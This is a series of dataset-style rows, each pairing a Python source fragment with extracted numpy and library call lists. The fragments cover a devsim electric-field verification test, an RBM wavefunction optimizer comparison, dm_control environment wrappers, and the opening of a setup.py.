    node_to_edge_indexes = element_data['node_to_edge_indexes']
    edge_node_list = element_data['edge_node_list']
    for i in range(nen):
        edge_indexes = node_to_edge_indexes[i]
        for j in edge_indexes:
            for k in edge_indexes:
                if j == k:
                    continue
                wt = ecouple[nee*ei + k]
                wts[j] += wt
                # accumulate all nen derivative blocks for this edge
                for l in range(nen):
                    row_stride = slice(dim*l,dim*(l+1))
                    outs[j,row_stride] += wt * vector_efield_derivatives[i][:,l]
    for i in range(nee):
        outs[i] /= wts[i]
        # reorder: element-node ordering -> this edge's node-list ordering
        for k in range(nen):
            nk = node_indexes[k]
            for kk in range(nen):
                nkk = edge_node_list[i][kk]
                if nk == nkk:
                    # output block (kk+1) skips the leading value columns
                    row_stride1 = slice(dim*(kk+1),dim*(kk+2))
                    row_stride2 = slice(dim*(k),dim*(k+1))
                    output[nee*ei + i,row_stride1] = numpy.transpose(outs[i, row_stride2])
                    break
def GetScalarField(device, region, name, mname):
    """Create element model *name* evaluating equation *mname* and return its
    values as a numpy array (one entry per element edge)."""
    element_model(device=device, region=region, name=name, equation=mname)
    return numpy.array(get_element_model_values(device=device, region=region, name=name))
def GetScalarFieldDerivatives(device, region, name, mname, vname):
    """Create and fetch the derivative models of *mname* with respect to
    *vname* at both edge end nodes (node 0 and node 1).

    Returns a list of two value arrays, one per end node.
    """
    values = []
    for node in range(2):
        out_name = name + str(node)
        deriv_equation = "%s:%s@n%d" % (mname, vname, node)
        element_model(device=device, region=region, name=out_name,
                      equation=deriv_equation)
        values.append(
            get_element_model_values(device=device, region=region, name=out_name))
    return values
def GetNodeIndexes(device, region):
    """Return the node indexes per element-node position.

    Entry [i] is the list of integer node ids recorded at position i on each
    element edge (nen positions total).
    """
    element_from_node_model(node_model="node_index", device=device, region=region)
    indexes = []
    for position in range(nen):
        raw_values = get_element_model_values(
            device=device, region=region, name="node_index@en%d" % position)
        indexes.append([int(value) for value in raw_values])
    return indexes
def GetUnitVectors(device, region):
    """Evaluate the per-edge unit vector components, one value list per
    coordinate direction (x, y[, z])."""
    vectors = []
    for axis in range(dim):
        model_name = "s%s" % directions[axis]
        element_model(device=device, region=region, name=model_name,
                      equation="unit%s" % directions[axis])
        vectors.append(
            get_element_model_values(device=device, region=region, name=model_name))
    return vectors
def SetupOutputCompare(device, region, model, variable, output):
    """Fill ``output`` with devsim's own element-field values and derivatives
    for comparison against the hand-rolled calculation.

    Column layout matches the Python-side output: dim value columns first,
    then dim derivative columns per element node.
    """
    element_from_edge_model(device=device, region=region, edge_model=model)
    element_from_edge_model(device=device, region=region, edge_model=model, derivative=variable)
    k = 0
    # value columns
    for i in range(dim):
        mname = "ElectricField_" + directions[i]
        output[:,k] = numpy.array(get_element_model_values(device=device, region=region, name=mname))
        print("%d %s" % (k, mname))
        k += 1
    # derivative columns: one dim-block per element node
    for j in range(nen):
        for i in range(dim):
            mname = "ElectricField_" + directions[i]
            dname = mname + ":Potential@en%d" % j
            output[:,k] = numpy.array(get_element_model_values(device=device, region=region, name=dname))
            print("%d %s" % (k, dname))
            k += 1
def DoCompare(output, output_compare, number_test):
    """Report differences between the Python-side result and devsim's result.

    Prints the infinity norm over the tested rows, then flags any
    (row, column-block) whose norm exceeds 1e-4, and finally dumps the first
    element's value block for visual inspection.
    """
    test2 = output[0:nee*number_test] - output_compare[0:nee*number_test]
    print(numpy.linalg.norm(test2, ord=numpy.inf ))
    for row in range(number_test):
        # 5 blocks: 1 value block + up to 4 derivative blocks per column layout
        for col in range(5):
            sl1 = slice(nee*row,nee*(row+1))
            sl2 = slice(dim*col,dim*(col+1))
            norm = numpy.linalg.norm(output[(sl1, sl2)]-output_compare[(sl1,sl2)])
            if norm > 1e-4:
                print("%d %d %g" % (row, col, norm))
    # debug dump of element 0, value block only
    row = 0
    if True:
        #for row in range(10):
        col = 0
        sl1 = slice(nee*row,nee*(row+1))
        sl2 = slice(dim*col,dim*(col+1))
        print(output[(sl1, sl2)])
        print(output_compare[(sl1,sl2)])
        print(output[(sl1, sl2)] - output_compare[(sl1,sl2)])
def RunTest(device, region, number_test):
    """Run the element-field verification over the first ``number_test``
    elements (all elements when number_test < 1) and compare the Python
    reconstruction against devsim's built-in element field models."""
    scalar_efield = GetScalarField(device, region, "scalar_efield", "ElectricField")
    scalar_efield_derivatives = GetScalarFieldDerivatives(device, region, "scalar_efield_n", "ElectricField", "Potential")
    node_indexes = GetNodeIndexes(device, region)
    unit_vectors = GetUnitVectors(device, region)
    # nee entries per element in the edge-based arrays
    number_elements = len(scalar_efield)//nee
    if number_test < 1:
        number_test = number_elements
    # columns: dim values + dim derivatives per element node
    output = numpy.zeros((nee*number_elements, dim*(nen+1)))
    output_compare = numpy.zeros((nee*number_elements, dim*(nen+1)))
    ecouple = None
    if dim == 2:
        # edge couples are only used by the 2D weighting scheme
        ecouple = get_element_model_values(device=device, region=region, name="ElementEdgeCouple")
    for ei in range(number_test):
        edata = GetElementData(ei, node_indexes)
        edata['matrices'] = GetNodeMatrices(edata, unit_vectors)
        vector_efields = CalculateEField(edata, scalar_efield)
        vector_efield_derivatives = CalculateEFieldDerivatives(edata, scalar_efield_derivatives)
        if dim == 2:
            CalculateFinalValues2D(edata, vector_efields, ecouple, output)
            CalculateFinalDerivatives2D(edata, vector_efield_derivatives, ecouple, output)
        elif dim == 3:
            CalculateFinalValues3D(edata, vector_efields, output)
            CalculateFinalDerivatives3D(edata, vector_efield_derivatives, output)
    SetupOutputCompare(device, region, "ElectricField", "Potential", output_compare)
    DoCompare(output, output_compare, number_test)
| [
"numpy.transpose",
"numpy.zeros",
"numpy.linalg.norm",
"numpy.linalg.solve",
"sys.exit"
] | [((6672, 6691), 'numpy.zeros', 'numpy.zeros', (['(nee,)'], {}), '((nee,))\n', (6683, 6691), False, 'import numpy\n'), ((6749, 6772), 'numpy.zeros', 'numpy.zeros', (['(nee, dim)'], {}), '((nee, dim))\n', (6760, 6772), False, 'import numpy\n'), ((7440, 7459), 'numpy.zeros', 'numpy.zeros', (['(nee,)'], {}), '((nee,))\n', (7451, 7459), False, 'import numpy\n'), ((7517, 7546), 'numpy.zeros', 'numpy.zeros', (['(nee, nen * dim)'], {}), '((nee, nen * dim))\n', (7528, 7546), False, 'import numpy\n'), ((11731, 11784), 'numpy.zeros', 'numpy.zeros', (['(nee * number_elements, dim * (nen + 1))'], {}), '((nee * number_elements, dim * (nen + 1)))\n', (11742, 11784), False, 'import numpy\n'), ((11798, 11851), 'numpy.zeros', 'numpy.zeros', (['(nee * number_elements, dim * (nen + 1))'], {}), '((nee * number_elements, dim * (nen + 1)))\n', (11809, 11851), False, 'import numpy\n'), ((1401, 1412), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1409, 1412), False, 'import sys\n'), ((2925, 2948), 'numpy.zeros', 'numpy.zeros', (['(dim, dim)'], {}), '((dim, dim))\n', (2936, 2948), False, 'import numpy\n'), ((3428, 3449), 'numpy.zeros', 'numpy.zeros', (['(dim, 1)'], {}), '((dim, 1))\n', (3439, 3449), False, 'import numpy\n'), ((3570, 3604), 'numpy.linalg.solve', 'numpy.linalg.solve', (['matrices[i]', 'B'], {}), '(matrices[i], B)\n', (3588, 3604), False, 'import numpy\n'), ((4053, 4076), 'numpy.zeros', 'numpy.zeros', (['(dim, nen)'], {}), '((dim, nen))\n', (4064, 4076), False, 'import numpy\n'), ((4764, 4798), 'numpy.linalg.solve', 'numpy.linalg.solve', (['matrices[i]', 'B'], {}), '(matrices[i], B)\n', (4782, 4798), False, 'import numpy\n'), ((7206, 7230), 'numpy.transpose', 'numpy.transpose', (['outs[i]'], {}), '(outs[i])\n', (7221, 7230), False, 'import numpy\n'), ((10694, 10733), 'numpy.linalg.norm', 'numpy.linalg.norm', (['test2'], {'ord': 'numpy.inf'}), '(test2, ord=numpy.inf)\n', (10711, 10733), False, 'import numpy\n'), ((5235, 5275), 'numpy.transpose', 'numpy.transpose', 
(['vector_efields[i][:, 0]'], {}), '(vector_efields[i][:, 0])\n', (5250, 5275), False, 'import numpy\n'), ((10885, 10947), 'numpy.linalg.norm', 'numpy.linalg.norm', (['(output[sl1, sl2] - output_compare[sl1, sl2])'], {}), '(output[sl1, sl2] - output_compare[sl1, sl2])\n', (10902, 10947), False, 'import numpy\n'), ((6186, 6237), 'numpy.transpose', 'numpy.transpose', (['vector_efield_derivatives[i][:, k]'], {}), '(vector_efield_derivatives[i][:, k])\n', (6201, 6237), False, 'import numpy\n'), ((8606, 8643), 'numpy.transpose', 'numpy.transpose', (['outs[i, row_stride2]'], {}), '(outs[i, row_stride2])\n', (8621, 8643), False, 'import numpy\n')] |
import numpy as np
import matplotlib.pyplot as plt
import matplotlib2tikz
from qflow.wavefunctions import RBMWavefunction
from qflow.hamiltonians import HarmonicOscillator
from qflow.samplers import ImportanceSampler
from qflow.optimizers import SgdOptimizer, AdamOptimizer
from qflow.training import EnergyCallback, train
from qflow.mpi import master_rank
# Compare several optimizers training an RBM wavefunction on a 1-particle,
# 1-dimensional harmonic oscillator; plot the energy error per optimizer.
N, D = 1, 1
system = np.empty((N, D))
H = HarmonicOscillator(omega_ho=1)
psi = RBMWavefunction(N * D, 2)
# psi = SimpleGaussian(0.3)
# NOTE(review): org_params is never used (restoring it below is commented
# out); a fresh RBMWavefunction is built for each optimizer instead.
org_params = psi.parameters[:]
# NOTE(review): this sampler is immediately shadowed inside the loop below.
sampler = ImportanceSampler(system, psi, 0.5)
# plot legend labels, one per optimizer below (order must match)
labels = [
    r"Sgd($\eta=1$)",
    r"Sgd($\eta=0.1$)",
    r"Sgd($\eta=0.05$)",
    r"Adam($\eta=0.1,\beta_1=0.9$)",
    r"Adam($\eta=0.1,\beta_1=0.8$)",
]
optimizers = [
    SgdOptimizer(1),
    SgdOptimizer(0.1),
    SgdOptimizer(0.05),
    AdamOptimizer(len(psi.parameters), 0.1, 0.9),
    AdamOptimizer(len(psi.parameters), 0.1, 0.8),
]
E = []
for opt in optimizers:
    # psi.parameters = org_params
    # fresh wavefunction and sampler per optimizer for a fair comparison
    psi = RBMWavefunction(N * D, 2)
    # psi = SimpleGaussian(0.8)
    sampler = ImportanceSampler(system, psi, 0.1)
    sampler.thermalize(10000)
    E_training = EnergyCallback(samples=1000000, verbose=True)
    train(
        psi,
        H,
        sampler,
        iters=500,
        samples=1000,
        gamma=0.0,
        optimizer=opt,
        call_backs=[E_training],
        call_back_resolution=50,
    )
    E.append(np.asarray(E_training))
# only the MPI master rank produces the plot
if master_rank():
    fig, ax = plt.subplots()
    ax.set_xlabel(r"% of training")
    ax.set_ylabel(r"Energy error [a.u.]")
    for e, label in zip(E, labels):
        # exact ground state energy is D/2 (a.u.) for omega=1
        ax.semilogy(np.abs(e / N - D / 2), label=label)
    ax.legend()
    matplotlib2tikz.save(
        __file__ + ".tex",
        extra_axis_parameters=["compat=newest", "legend pos=outer north east"],
    )
    plt.show()
| [
"matplotlib2tikz.save",
"matplotlib.pyplot.show",
"numpy.abs",
"qflow.training.train",
"qflow.mpi.master_rank",
"numpy.empty",
"qflow.hamiltonians.HarmonicOscillator",
"numpy.asarray",
"qflow.wavefunctions.RBMWavefunction",
"qflow.samplers.ImportanceSampler",
"matplotlib.pyplot.subplots",
"qfl... | [((380, 396), 'numpy.empty', 'np.empty', (['(N, D)'], {}), '((N, D))\n', (388, 396), True, 'import numpy as np\n'), ((401, 431), 'qflow.hamiltonians.HarmonicOscillator', 'HarmonicOscillator', ([], {'omega_ho': '(1)'}), '(omega_ho=1)\n', (419, 431), False, 'from qflow.hamiltonians import HarmonicOscillator\n'), ((438, 463), 'qflow.wavefunctions.RBMWavefunction', 'RBMWavefunction', (['(N * D)', '(2)'], {}), '(N * D, 2)\n', (453, 463), False, 'from qflow.wavefunctions import RBMWavefunction\n'), ((533, 568), 'qflow.samplers.ImportanceSampler', 'ImportanceSampler', (['system', 'psi', '(0.5)'], {}), '(system, psi, 0.5)\n', (550, 568), False, 'from qflow.samplers import ImportanceSampler\n'), ((1437, 1450), 'qflow.mpi.master_rank', 'master_rank', ([], {}), '()\n', (1448, 1450), False, 'from qflow.mpi import master_rank\n'), ((747, 762), 'qflow.optimizers.SgdOptimizer', 'SgdOptimizer', (['(1)'], {}), '(1)\n', (759, 762), False, 'from qflow.optimizers import SgdOptimizer, AdamOptimizer\n'), ((768, 785), 'qflow.optimizers.SgdOptimizer', 'SgdOptimizer', (['(0.1)'], {}), '(0.1)\n', (780, 785), False, 'from qflow.optimizers import SgdOptimizer, AdamOptimizer\n'), ((791, 809), 'qflow.optimizers.SgdOptimizer', 'SgdOptimizer', (['(0.05)'], {}), '(0.05)\n', (803, 809), False, 'from qflow.optimizers import SgdOptimizer, AdamOptimizer\n'), ((987, 1012), 'qflow.wavefunctions.RBMWavefunction', 'RBMWavefunction', (['(N * D)', '(2)'], {}), '(N * D, 2)\n', (1002, 1012), False, 'from qflow.wavefunctions import RBMWavefunction\n'), ((1059, 1094), 'qflow.samplers.ImportanceSampler', 'ImportanceSampler', (['system', 'psi', '(0.1)'], {}), '(system, psi, 0.1)\n', (1076, 1094), False, 'from qflow.samplers import ImportanceSampler\n'), ((1142, 1187), 'qflow.training.EnergyCallback', 'EnergyCallback', ([], {'samples': '(1000000)', 'verbose': '(True)'}), '(samples=1000000, verbose=True)\n', (1156, 1187), False, 'from qflow.training import EnergyCallback, train\n'), ((1192, 1319), 
'qflow.training.train', 'train', (['psi', 'H', 'sampler'], {'iters': '(500)', 'samples': '(1000)', 'gamma': '(0.0)', 'optimizer': 'opt', 'call_backs': '[E_training]', 'call_back_resolution': '(50)'}), '(psi, H, sampler, iters=500, samples=1000, gamma=0.0, optimizer=opt,\n call_backs=[E_training], call_back_resolution=50)\n', (1197, 1319), False, 'from qflow.training import EnergyCallback, train\n'), ((1466, 1480), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (1478, 1480), True, 'import matplotlib.pyplot as plt\n'), ((1671, 1787), 'matplotlib2tikz.save', 'matplotlib2tikz.save', (["(__file__ + '.tex')"], {'extra_axis_parameters': "['compat=newest', 'legend pos=outer north east']"}), "(__file__ + '.tex', extra_axis_parameters=[\n 'compat=newest', 'legend pos=outer north east'])\n", (1691, 1787), False, 'import matplotlib2tikz\n'), ((1810, 1820), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1818, 1820), True, 'import matplotlib.pyplot as plt\n'), ((1408, 1430), 'numpy.asarray', 'np.asarray', (['E_training'], {}), '(E_training)\n', (1418, 1430), True, 'import numpy as np\n'), ((1615, 1636), 'numpy.abs', 'np.abs', (['(e / N - D / 2)'], {}), '(e / N - D / 2)\n', (1621, 1636), True, 'import numpy as np\n')] |
from collections import OrderedDict, deque
from typing import Any, NamedTuple
import dm_env
import numpy as np
from dm_control import manipulation, suite
from dm_control.suite.wrappers import action_scale, pixels
from dm_env import StepType, specs
import custom_dmc_tasks as cdmc
class ExtendedTimeStep(NamedTuple):
    """A dm_env-style TimeStep extended with the action taken and the raw
    physics state.  Field order matters: _replace/positional construction
    elsewhere depends on it."""
    step_type: Any
    reward: Any
    discount: Any
    observation: Any
    action: Any
    physics: Any

    def first(self):
        # True on the first step of an episode.
        return self.step_type == StepType.FIRST

    def mid(self):
        # True on intermediate steps.
        return self.step_type == StepType.MID

    def last(self):
        # True on the terminal step.
        return self.step_type == StepType.LAST

    def __getitem__(self, attr):
        # Allow dict-style access by field name, e.g. ts['reward'].
        return getattr(self, attr)
class FlattenJacoObservationWrapper(dm_env.Environment):
    """Flatten Jaco observations into a single float32 'observations' vector.

    If the wrapped env provides a 'front_close' camera entry, it is exposed
    separately under 'pixels' (leading batch dim dropped); every remaining
    float64 entry is raveled and concatenated into 'observations'.
    """

    def __init__(self, env):
        self._env = env
        self._obs_spec = OrderedDict()
        wrapped_obs_spec = env.observation_spec().copy()
        if 'front_close' in wrapped_obs_spec:
            spec = wrapped_obs_spec['front_close']
            # drop batch dim
            self._obs_spec['pixels'] = specs.BoundedArray(shape=spec.shape[1:],
                                                          dtype=spec.dtype,
                                                          minimum=spec.minimum,
                                                          maximum=spec.maximum,
                                                          name='pixels')
            wrapped_obs_spec.pop('front_close')

        for spec in wrapped_obs_spec.values():
            assert spec.dtype == np.float64
            assert type(spec) == specs.Array
        # Total flattened length of the remaining entries.
        # BUGFIX: use the builtin ``int`` here -- the ``np.int`` alias was
        # deprecated in NumPy 1.20 and removed in 1.24, so the original
        # raised AttributeError on modern NumPy.
        dim = np.sum(
            np.fromiter((int(np.prod(spec.shape))
                         for spec in wrapped_obs_spec.values()), np.int32))

        self._obs_spec['observations'] = specs.Array(shape=(dim,),
                                                     dtype=np.float32,
                                                     name='observations')

    def _transform_observation(self, time_step):
        """Split out 'pixels' (if present) and flatten the rest."""
        obs = OrderedDict()
        if 'front_close' in time_step.observation:
            pixels = time_step.observation['front_close']
            time_step.observation.pop('front_close')
            pixels = np.squeeze(pixels)
            obs['pixels'] = pixels
        features = []
        for feature in time_step.observation.values():
            features.append(feature.ravel())
        obs['observations'] = np.concatenate(features, axis=0)
        return time_step._replace(observation=obs)

    def reset(self):
        time_step = self._env.reset()
        return self._transform_observation(time_step)

    def step(self, action):
        time_step = self._env.step(action)
        return self._transform_observation(time_step)

    def observation_spec(self):
        return self._obs_spec

    def action_spec(self):
        return self._env.action_spec()

    def __getattr__(self, name):
        # Delegate everything else to the wrapped environment.
        return getattr(self._env, name)
class ActionRepeatWrapper(dm_env.Environment):
    """Repeat each action ``num_repeats`` times, accumulating the discounted
    reward; stops early if the episode ends mid-repeat."""

    def __init__(self, env, num_repeats):
        self._env = env
        self._num_repeats = num_repeats

    def step(self, action):
        total_reward = 0.0
        running_discount = 1.0
        for _ in range(self._num_repeats):
            time_step = self._env.step(action)
            total_reward += time_step.reward * running_discount
            running_discount *= time_step.discount
            if time_step.last():
                break
        return time_step._replace(reward=total_reward,
                                  discount=running_discount)

    def observation_spec(self):
        return self._env.observation_spec()

    def action_spec(self):
        return self._env.action_spec()

    def reset(self):
        return self._env.reset()

    def __getattr__(self, name):
        # Delegate anything not defined here to the wrapped environment.
        return getattr(self._env, name)
class FrameStackWrapper(dm_env.Environment):
    """Stack the last ``num_frames`` pixel observations along the channel
    axis, exposing a single uint8 array of shape (C*num_frames, H, W)."""

    def __init__(self, env, num_frames, pixels_key='pixels'):
        self._env = env
        self._num_frames = num_frames
        # ring buffer of the most recent frames (channels-first)
        self._frames = deque([], maxlen=num_frames)
        self._pixels_key = pixels_key

        wrapped_obs_spec = env.observation_spec()
        assert pixels_key in wrapped_obs_spec

        pixels_shape = wrapped_obs_spec[pixels_key].shape
        # remove batch dim
        if len(pixels_shape) == 4:
            pixels_shape = pixels_shape[1:]
        self._obs_spec = specs.BoundedArray(shape=np.concatenate(
            [[pixels_shape[2] * num_frames], pixels_shape[:2]], axis=0),
                                           dtype=np.uint8,
                                           minimum=0,
                                           maximum=255,
                                           name='observation')

    def _transform_observation(self, time_step):
        # concatenate the buffered frames along the channel axis
        assert len(self._frames) == self._num_frames
        obs = np.concatenate(list(self._frames), axis=0)
        return time_step._replace(observation=obs)

    def _extract_pixels(self, time_step):
        pixels = time_step.observation[self._pixels_key]
        # remove batch dim
        if len(pixels.shape) == 4:
            pixels = pixels[0]
        # HWC -> CHW, copied so the buffer owns its data
        return pixels.transpose(2, 0, 1).copy()

    def reset(self):
        time_step = self._env.reset()
        pixels = self._extract_pixels(time_step)
        # fill the whole buffer with the first frame
        for _ in range(self._num_frames):
            self._frames.append(pixels)
        return self._transform_observation(time_step)

    def step(self, action):
        time_step = self._env.step(action)
        pixels = self._extract_pixels(time_step)
        self._frames.append(pixels)
        return self._transform_observation(time_step)

    def observation_spec(self):
        return self._obs_spec

    def action_spec(self):
        return self._env.action_spec()

    def __getattr__(self, name):
        # Delegate anything not defined here to the wrapped environment.
        return getattr(self._env, name)
class ActionDTypeWrapper(dm_env.Environment):
    """Expose the wrapped env's action spec under a different dtype; actions
    are cast back to the env's native dtype before being applied."""

    def __init__(self, env, dtype):
        self._env = env
        inner_spec = env.action_spec()
        self._action_spec = specs.BoundedArray(inner_spec.shape,
                                              dtype,
                                              inner_spec.minimum,
                                              inner_spec.maximum,
                                              'action')

    def step(self, action):
        native_action = action.astype(self._env.action_spec().dtype)
        return self._env.step(native_action)

    def observation_spec(self):
        return self._env.observation_spec()

    def action_spec(self):
        return self._action_spec

    def reset(self):
        return self._env.reset()

    def __getattr__(self, name):
        # Delegate anything not defined here to the wrapped environment.
        return getattr(self._env, name)
class ObservationDTypeWrapper(dm_env.Environment):
    """Unwrap the flat 'observations' entry and cast it to *dtype*, exposing
    it directly as the observation."""

    def __init__(self, env, dtype):
        self._env = env
        self._dtype = dtype
        inner_spec = env.observation_spec()['observations']
        self._obs_spec = specs.Array(inner_spec.shape, dtype, 'observation')

    def _transform_observation(self, time_step):
        cast_obs = time_step.observation['observations'].astype(self._dtype)
        return time_step._replace(observation=cast_obs)

    def reset(self):
        return self._transform_observation(self._env.reset())

    def step(self, action):
        return self._transform_observation(self._env.step(action))

    def observation_spec(self):
        return self._obs_spec

    def action_spec(self):
        return self._env.action_spec()

    def __getattr__(self, name):
        # Delegate anything not defined here to the wrapped environment.
        return getattr(self._env, name)
class ExtendedTimeStepWrapper(dm_env.Environment):
    """Convert time steps into ExtendedTimeStep, filling in the action taken,
    defaulting None reward/discount, and attaching the raw physics state."""

    def __init__(self, env):
        self._env = env
        physics = env.physics.state()
        self._physics_spec = specs.Array(physics.shape,
                                        dtype=physics.dtype,
                                        name='physics')

    def reset(self):
        time_step = self._env.reset()
        return self._augment_time_step(time_step)

    def step(self, action):
        time_step = self._env.step(action)
        return self._augment_time_step(time_step, action)

    def _augment_time_step(self, time_step, action=None):
        # On reset there is no action; substitute zeros of the right spec.
        if action is None:
            action_spec = self.action_spec()
            action = np.zeros(action_spec.shape, dtype=action_spec.dtype)

        def default_on_none(value, default):
            if value is None:
                return default
            return value

        return ExtendedTimeStep(observation=time_step.observation,
                                step_type=time_step.step_type,
                                action=action,
                                reward=default_on_none(time_step.reward, 0.0),
                                discount=default_on_none(
                                    time_step.discount, 1.0),
                                physics=self._env.physics.state())

    def observation_spec(self):
        return self._env.observation_spec()

    def action_spec(self):
        return self._env.action_spec()

    def reward_spec(self):
        spec = self._env.reward_spec()
        # self._task resolves through __getattr__ on the wrapped env; prefer a
        # task-provided spec when one exists.
        if hasattr(self._task, 'get_reward_spec'):
            task_spec = self._task.get_reward_spec()
            if task_spec is not None:
                spec = task_spec
        # promote scalar specs to shape (1,) float32
        if len(spec.shape) == 0:
            spec = spec.replace(shape=tuple((1,)), dtype=np.float32)
        return spec

    def physics_spec(self):
        return self._physics_spec

    def discount_spec(self):
        spec = self._env.discount_spec()
        # same task-override and scalar-promotion logic as reward_spec
        if hasattr(self._task, 'get_discount_spec'):
            task_spec = self._task.get_discount_spec()
            if task_spec is not None:
                spec = task_spec
        if len(spec.shape) == 0:
            spec = spec.replace(shape=tuple((1,)), dtype=np.float32)
        return spec

    def __getattr__(self, name):
        # Delegate anything not defined here to the wrapped environment.
        return getattr(self._env, name)
def _make_jaco(obs_type, domain, task, frame_stack, action_repeat, seed):
    """Build a Jaco arm environment with dtype, action-repeat and observation
    flattening wrappers applied."""
    base_env = cdmc.make_jaco(task, obs_type, seed)
    wrapped = ActionDTypeWrapper(base_env, np.float32)
    wrapped = ActionRepeatWrapper(wrapped, action_repeat)
    return FlattenJacoObservationWrapper(wrapped)
def _make_dmc(obs_type, domain, task, frame_stack, action_repeat, seed):
    """Build a DeepMind Control suite environment (or a custom task when the
    pair is not in the suite), with dtype/repeat/pixel wrappers applied."""
    shared_kwargs = dict(
        task_kwargs=dict(random=seed),
        environment_kwargs=dict(flat_observation=True),
        visualize_reward=False,
    )
    if (domain, task) in suite.ALL_TASKS:
        env = suite.load(domain, task, **shared_kwargs)
    else:
        env = cdmc.make(domain, task, **shared_kwargs)
    env = ActionDTypeWrapper(env, np.float32)
    env = ActionRepeatWrapper(env, action_repeat)
    if obs_type == 'pixels':
        # zoom in camera for quadruped
        camera_id = dict(quadruped=2).get(domain, 0)
        render_kwargs = dict(height=84, width=84, camera_id=camera_id)
        env = pixels.Wrapper(env,
                             pixels_only=True,
                             render_kwargs=render_kwargs)
    return env
def make(name, obs_type='states', frame_stack=1, action_repeat=1, seed=1):
    """Create a fully wrapped environment from a 'domain_task' name string."""
    assert obs_type in ['states', 'pixels']
    # split the name into domain and task; point_mass_maze names embed
    # underscores in the domain part
    if name.startswith('point_mass_maze'):
        domain = 'point_mass_maze'
        _, _, _, task = name.split('_', 3)
    else:
        domain, task = name.split('_', 1)
    # 'cup' is an alias for the suite's 'ball_in_cup' domain
    domain = dict(cup='ball_in_cup').get(domain, domain)

    builder = _make_jaco if domain == 'jaco' else _make_dmc
    env = builder(obs_type, domain, task, frame_stack, action_repeat, seed)

    if obs_type == 'pixels':
        env = FrameStackWrapper(env, frame_stack)
    else:
        env = ObservationDTypeWrapper(env, np.float32)

    # rescale actions to [-1, 1] and attach extended time steps
    env = action_scale.Wrapper(env, minimum=-1.0, maximum=+1.0)
    return ExtendedTimeStepWrapper(env)
| [
"dm_env.specs.Array",
"dm_control.suite.wrappers.pixels.Wrapper",
"collections.deque",
"numpy.zeros",
"dm_env.specs.BoundedArray",
"numpy.prod",
"custom_dmc_tasks.make_jaco",
"collections.OrderedDict",
"numpy.squeeze",
"dm_control.suite.wrappers.action_scale.Wrapper",
"numpy.concatenate",
"dm_... | [((10067, 10103), 'custom_dmc_tasks.make_jaco', 'cdmc.make_jaco', (['task', 'obs_type', 'seed'], {}), '(task, obs_type, seed)\n', (10081, 10103), True, 'import custom_dmc_tasks as cdmc\n'), ((12004, 12057), 'dm_control.suite.wrappers.action_scale.Wrapper', 'action_scale.Wrapper', (['env'], {'minimum': '(-1.0)', 'maximum': '(+1.0)'}), '(env, minimum=-1.0, maximum=+1.0)\n', (12024, 12057), False, 'from dm_control.suite.wrappers import action_scale, pixels\n'), ((837, 850), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (848, 850), False, 'from collections import OrderedDict, deque\n'), ((1805, 1869), 'dm_env.specs.Array', 'specs.Array', ([], {'shape': '(dim,)', 'dtype': 'np.float32', 'name': '"""observations"""'}), "(shape=(dim,), dtype=np.float32, name='observations')\n", (1816, 1869), False, 'from dm_env import StepType, specs\n'), ((2040, 2053), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (2051, 2053), False, 'from collections import OrderedDict, deque\n'), ((2445, 2477), 'numpy.concatenate', 'np.concatenate', (['features'], {'axis': '(0)'}), '(features, axis=0)\n', (2459, 2477), True, 'import numpy as np\n'), ((3975, 4003), 'collections.deque', 'deque', (['[]'], {'maxlen': 'num_frames'}), '([], maxlen=num_frames)\n', (3980, 4003), False, 'from collections import OrderedDict, deque\n'), ((5975, 6100), 'dm_env.specs.BoundedArray', 'specs.BoundedArray', (['wrapped_action_spec.shape', 'dtype', 'wrapped_action_spec.minimum', 'wrapped_action_spec.maximum', '"""action"""'], {}), "(wrapped_action_spec.shape, dtype, wrapped_action_spec.\n minimum, wrapped_action_spec.maximum, 'action')\n", (5993, 6100), False, 'from dm_env import StepType, specs\n'), ((6912, 6969), 'dm_env.specs.Array', 'specs.Array', (['wrapped_obs_spec.shape', 'dtype', '"""observation"""'], {}), "(wrapped_obs_spec.shape, dtype, 'observation')\n", (6923, 6969), False, 'from dm_env import StepType, specs\n'), ((7797, 7860), 'dm_env.specs.Array', 'specs.Array', 
(['physics.shape'], {'dtype': 'physics.dtype', 'name': '"""physics"""'}), "(physics.shape, dtype=physics.dtype, name='physics')\n", (7808, 7860), False, 'from dm_env import StepType, specs\n'), ((11220, 11286), 'dm_control.suite.wrappers.pixels.Wrapper', 'pixels.Wrapper', (['env'], {'pixels_only': '(True)', 'render_kwargs': 'render_kwargs'}), '(env, pixels_only=True, render_kwargs=render_kwargs)\n', (11234, 11286), False, 'from dm_control.suite.wrappers import action_scale, pixels\n'), ((1073, 1195), 'dm_env.specs.BoundedArray', 'specs.BoundedArray', ([], {'shape': 'spec.shape[1:]', 'dtype': 'spec.dtype', 'minimum': 'spec.minimum', 'maximum': 'spec.maximum', 'name': '"""pixels"""'}), "(shape=spec.shape[1:], dtype=spec.dtype, minimum=spec.\n minimum, maximum=spec.maximum, name='pixels')\n", (1091, 1195), False, 'from dm_env import StepType, specs\n'), ((2238, 2256), 'numpy.squeeze', 'np.squeeze', (['pixels'], {}), '(pixels)\n', (2248, 2256), True, 'import numpy as np\n'), ((8335, 8387), 'numpy.zeros', 'np.zeros', (['action_spec.shape'], {'dtype': 'action_spec.dtype'}), '(action_spec.shape, dtype=action_spec.dtype)\n', (8343, 8387), True, 'import numpy as np\n'), ((4354, 4428), 'numpy.concatenate', 'np.concatenate', (['[[pixels_shape[2] * num_frames], pixels_shape[:2]]'], {'axis': '(0)'}), '([[pixels_shape[2] * num_frames], pixels_shape[:2]], axis=0)\n', (4368, 4428), True, 'import numpy as np\n'), ((5098, 5123), 'dm_control.suite.wrappers.pixels.transpose', 'pixels.transpose', (['(2)', '(0)', '(1)'], {}), '(2, 0, 1)\n', (5114, 5123), False, 'from dm_control.suite.wrappers import action_scale, pixels\n'), ((1666, 1685), 'numpy.prod', 'np.prod', (['spec.shape'], {}), '(spec.shape)\n', (1673, 1685), True, 'import numpy as np\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The setup script.
"""
# Third-party
import numpy
from numpy import f2py
from setuptools.extension import Extension
from setuptools import find_packages
from setuptools import setup
from setuptools.command.build_ext import build_ext
# Import Cython AFTER setuptools
from Cython.Build import cythonize # isort: skip
from Cython import Compiler # isort:skip
def read_file(path):
